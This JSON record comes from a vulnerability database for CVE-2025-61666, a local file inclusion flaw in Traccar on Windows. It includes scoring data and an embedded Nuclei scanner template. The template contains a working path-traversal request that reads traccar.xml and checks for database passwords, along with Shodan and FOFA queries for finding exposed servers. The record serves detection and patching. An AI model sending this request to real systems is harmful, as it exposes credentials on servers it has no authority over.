{
  "_links": {
    "capec": {
      "href": "/api/v1/vulnerability/cve-2025-61666/capec"
    },
    "cvss": {
      "href": "/api/v1/vulnerability/cve-2025-61666/cvss"
    },
    "cwe": {
      "href": "/api/v1/vulnerability/cve-2025-61666/cwe"
    },
    "enrichment": {
      "href": "/api/v1/vulnerability/cve-2025-61666/enrichment"
    },
    "gcve": {
      "href": "/api/v1/vulnerability/cve-2025-61666/gcve"
    },
    "self": {
      "href": "/api/v1/vulnerability/cve-2025-61666"
    },
    "sightings": {
      "href": "/api/v1/sightings/cve-2025-61666"
    }
  },
  "enrichments": {
    "cisa-kev": {
      "kev": false
    },
    "epss": {
      "epss": 0.01282,
      "kev": false,
      "percentile": 0.68786
    },
    "nuclei": {
      "nuclei": true,
      "nuclei_template": "http/cves/2025/CVE-2025-61666.yaml",
      "nuclei_template_severity": "high",
      "nuclei_template_yaml": "id: CVE-2025-61666\n\ninfo:\n  name: Traccar(Windows) 6.1- 6.8.1 - Local File Inclusion\n  author: securitytaters\n  severity: high\n  description: |\n    Traccar 5.8-6.0 (non-default installs with web.override set) and 6.1-6.8.1 (default installs) contain a local file inclusion vulnerability caused by enabled web override configuration, letting unauthenticated attackers leak arbitrary files including passwords, exploit requires local access.\n  impact: |\n    Unauthenticated local attackers can read arbitrary files, potentially exposing sensitive information like passwords and configuration data.\n  remediation: |\n    Upgrade to version 6.9.0 or later.\n  reference:\n    - https://github.com/traccar/traccar/security/advisories/GHSA-hprc-rph8-fj87\n    - https://projectblack.io/blog/jetty-addpath-lfi/\n  metadata:\n    verified: true\n    max-request: 1\n    shodan-query: html:\"Traccar\"\n    fofa-query: app=\"Traccar\"\n  tags: cve,cve2025,traccar,lfi,vuln,vkev\n\nhttp:\n  - raw:\n      - |\n        GET /..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cProgram%20Files%5ctraccar%5cconf%5ctraccar.xml HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'contains(content_type, \"application/xml\")'\n          - 'contains_all(body, \"database.driver\",\"database.password\",\"database.user\")'\n          - 'status_code == 200'\n        condition: and\n# digest: 490a004630440220370b6e9dd2bd6a73365722f0e3592af94daf68a1a20fac279880e7a1e138d19e02204704df080f303d99e794479ce8f35e333f55abc50c40ac5e4af49d3380054ce8:922c64590222798bb761d5b6d8e72950"
    }
  },
  "vuln_id": "cve-2025-61666"
}